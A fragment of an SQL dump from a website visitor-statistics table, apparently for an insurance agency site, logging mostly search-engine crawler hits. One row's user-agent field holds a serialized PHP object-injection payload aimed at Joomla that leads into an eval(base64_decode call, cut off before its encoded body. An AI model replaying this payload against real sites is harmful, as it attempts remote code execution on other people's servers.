+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(986,'0b_c1966e165c0208497ce344091e04df6b','1457173190','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(989,'0b_e8cfb0f992b81c7191a328f79c630439','1457178335','89.163.148.58','ju058.jupiter.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(991,'0b_e8cfb0f992b81c7191a328f79c630439','1457178337','89.163.148.58','ju058.jupiter.fastwebserver.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(994,'0b_e8cfb0f992b81c7191a328f79c630439','1457178339','89.163.148.58','ju058.jupiter.fastwebserver.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(995,'0b_6ad2a1bbdb4998e8e3e5072789400054','1457178462','151.80.31.130','boson115.ahrefs.com','/robots.txt','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(997,'0b_baa2c1584a69957981c4b178894819c8','1457179456','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(1000,'0b_baa2c1584a69957981c4b178894819c8','1457179458','62.210.143.245','mj8.naefmarco.ch','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(1001,'0b_baa2c1584a69957981c4b178894819c8','1457179461','62.210.143.245','mj8.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(1004,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180495','78.46.196.116','solus.fairnode.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1006,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180497','78.46.196.116','solus.fairnode.eu','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1009,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180498','78.46.196.116','solus.fairnode.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1012,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180500','78.46.196.116','solus.fairnode.eu','/SSO/235_38.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1015,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180502','78.46.196.116','solus.fairnode.eu','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1018,'0b_601eae9a66545cfb737a24b8ae0766bc','1457180507','78.46.196.116','solus.fairnode.eu','/calc.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1019,'0b_fce104a308911941fb21f9ac700b0ab0','1457184999','46.4.120.3','static.3.120.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1021,'0b_fce104a308911941fb21f9ac700b0ab0','1457185002','46.4.120.3','static.3.120.4.46.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1024,'0b_932507c4ecd50358464e47788641356b','1457185111','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1025,'0b_63fcc1279ce3da8d3e20b26a0963dea3','1457187332','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1027,'0b_63fcc1279ce3da8d3e20b26a0963dea3','1457187334','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(1029,'0b_ba9183a127a570b78a39b1a10d8f5622','1457187488','69.197.177.26','69.197.177.26','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(1031,'0b_ba9183a127a570b78a39b1a10d8f5622','1457187499','69.197.177.26','69.197.177.26','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(1033,'0b_902f888ac0e86cac48edcacda884eb41','1457188032','66.249.73.187','crawl-66-249-73-187.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1035,'0b_ab754d7c606437c41abf0e2979eca2a0','1457190401','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1036,'0b_31a9c76dfc0d310b7f555ce9fbdd5661','1457192287','24.146.157.25','ool-18929d19.dyn.optonline.net','/','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','','',0,'Android 5','SamsungBrowser 2','us','','','','','','','0','0',0),(1039,'0b_31a9c76dfc0d310b7f555ce9fbdd5661','1457192289','24.146.157.25','ool-18929d19.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 2','us','','','','','','','0','0',0),(1042,'0b_ae91ec38e54f1f9e07eb4c50c49a9aef','1457192660','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(1045,'0b_31a9c76dfc0d310b7f555ce9fbdd5661','1457192673','24.146.157.25','ool-18929d19.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 2','us','','','','','','','0','0',0),(1046,'0b_cce3cb98605e973f6b8d4c9b39133577','1457199286','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1048,'0b_18e3316ba3ab80b747c5d3182e6a3b6e','1457199921','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1051,'0b_18e3316ba3ab80b747c5d3182e6a3b6e','1457199921','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1054,'0b_3f9c1f9ed8f97b505309b9a8e91a6869','1457201098','108.62.64.29','108.62.64.29','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 39','us','','','','','','','0','0',0),(1055,'0b_22303d314737f40c2468498f8c3a319c','1457201119','104.144.94.174','104.144.94.174','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 39','us','','','','','','','0','0',0),(1058,'0b_cfddd6a7d7684e6187f103a7c83b2c2c','1457202095','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1060,'0b_cfddd6a7d7684e6187f103a7c83b2c2c','1457202095','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1061,'0b_edee5a1e971c83bf8d5f454a71243cc6','1457202235','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1064,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206483','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1067,'0b_fea55c3eaf0fa33d46cb313d6a4286d3','1457206483','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1070,'0b_fea55c3eaf0fa33d46cb313d6a4286d3','1457206484','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1073,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206487','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1076,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206488','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1078,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206489','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1079,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206489','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1082,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206490','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1085,'0b_fea55c3eaf0fa33d46cb313d6a4286d3','1457206490','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1088,'0b_973cdeaace65695b9dc25e1ca566d8b0','1457206491','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1090,'0b_d4dbd894f6f20b004e4318fd3820cd85','1457206675','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1091,'0b_d4dbd894f6f20b004e4318fd3820cd85','1457207693','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1094,'0b_79d74cd201a4304d73de6af9a87f37a6','1457208940','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1097,'0b_ef5c47e52365f087d8ae93ddcd80f124','1457209002','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1099,'0b_ef5c47e52365f087d8ae93ddcd80f124','1457209482','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1100,'0b_4d7000889bdc5da0f2c402587e2ba8e5','1457209639','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1102,'0b_09da184066eadd95603308e463638b14','1457211196','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1105,'0b_822c3ab0e005ac7bddcd92187b09f830','1457212130','208.54.86.160','ma05636d0.tmodns.net','/','Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-G386T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','https://www.google.com/','_notprovided_',1,'Android 4','Safari 1','us','','Google','','','','','0','0',0),(1106,'0b_822c3ab0e005ac7bddcd92187b09f830','1457212133','208.54.86.160','ma05636d0.tmodns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-G386T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','','','','','','','0','0',0),(1109,'0b_3742d8040ca11ae7d16a4b76f32ba9f5','1457212143','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1112,'0b_2a4e91ef25fcdddd33d432813cdc42bb','1457212583','66.249.73.169','crawl-66-249-73-169.googlebot.com','/register/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1115,'0b_2a4e91ef25fcdddd33d432813cdc42bb','1457212756','66.249.73.178','crawl-66-249-73-178.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1118,'0b_6b56ef466e18a5ca2a5e851aaa2723b7','1457214459','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1121,'0b_7cff43a5fc8491e05448cd89f92b2231','1457215383','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(1123,'0b_766eed6e82c6fb7408db281e34f6c923','1457215433','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(1124,'0b_7d492af8a0df049f8c689ee003e006d5','1457219243','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1126,'0b_c65f2fb99770d1cba6e028515f012541','1457221021','207.46.13.85','msnbot-207-46-13-85.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(1129,'0b_d07630902f0ed4355417bb600a3f9cb3','1457222282','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(1132,'0b_0e12fc385589d313f444ef2b431c9ddd','1457223398','180.76.15.25','baiduspider-180-76-15-25.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1135,'0b_c09eada9d4ff1c72535280bc5f17f691','1457224466','66.249.73.178','crawl-66-249-73-178.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1138,'0b_fa1a250f42274948971b402353e22ad8','1457224691','65.55.210.173','msnbot-65-55-210-173.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(1141,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224954','69.84.207.246','security.lightspeedsystems.com','/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1144,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224957','69.84.207.246','security.lightspeedsystems.com','/igo/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1147,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224957','69.84.207.246','security.lightspeedsystems.com','/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1150,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224958','69.84.207.246','security.lightspeedsystems.com','/forms/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1151,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224959','69.84.207.246','security.lightspeedsystems.com','/contact/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1154,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224960','69.84.207.246','security.lightspeedsystems.com','/about-us/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1156,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224961','69.84.207.246','security.lightspeedsystems.com','/register/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1159,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224961','69.84.207.246','security.lightspeedsystems.com','/igo/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1162,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224962','69.84.207.246','security.lightspeedsystems.com','/carriers/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1165,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224963','69.84.207.246','security.lightspeedsystems.com','/home/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1166,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224964','69.84.207.246','security.lightspeedsystems.com','/insentives/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1168,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224964','69.84.207.246','security.lightspeedsystems.com','/case-status/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1171,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224965','69.84.207.246','security.lightspeedsystems.com','/agent-tools/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1172,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224966','69.84.207.246','security.lightspeedsystems.com','/term-quotes/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1175,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224967','69.84.207.246','security.lightspeedsystems.com','/contact/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1178,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224967','69.84.207.246','security.lightspeedsystems.com','/about-us/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1180,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224968','69.84.207.246','security.lightspeedsystems.com','/carriers/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1183,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224969','69.84.207.246','security.lightspeedsystems.com','/comments/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1186,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224969','69.84.207.246','security.lightspeedsystems.com','/register/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1189,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224970','69.84.207.246','security.lightspeedsystems.com','/case-status/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1192,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224970','69.84.207.246','security.lightspeedsystems.com','/term-quotes/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1193,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224971','69.84.207.246','security.lightspeedsystems.com','/agent-tools/feed/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1195,'0b_f363775048d93ca9eb23a19acd91fb4b','1457224971','69.84.207.246','security.lightspeedsystems.com','/licensing-contracting/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US','','',0,'WinNT','','','','','Unknown Spider','','','','0','0',0),(1196,'0b_f5d641b62801ac5ae6c6903dffceec45','1457226290','207.46.13.10','msnbot-207-46-13-10.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1198,'0b_f874259a787a6aeffafada94d1040b22','1457233548','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1201,'0b_627ba246e520f8319b43c998b821e273','1457234498','103.195.99.53','103.195.99.53','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:1182:\\\"eval(base64_decode','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(1204,'0b_581f243b53019d26b08698be6587bf28','1457236181','5.9.87.111','static.111.87.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1207,'0b_581f243b53019d26b08698be6587bf28','1457236184','5.9.87.111','static.111.87.9.5.clients.your-server.de','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1210,'0b_581f243b53019d26b08698be6587bf28','1457236228','5.9.87.111','static.111.87.9.5.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1211,'0b_0709ebca97d6b870ec98396c5ec33d0e','1457238165','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1214,'0b_b2247e24132947fb1df336a885702b56','1457238337','66.249.73.169','crawl-66-249-73-169.googlebot.com','/carriers/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1217,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238821','107.170.94.61','107.170.94.61','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(1220,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238831','107.170.94.61','107.170.94.61','/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(1222,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238842','107.170.94.61','107.170.94.61','/igo/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot 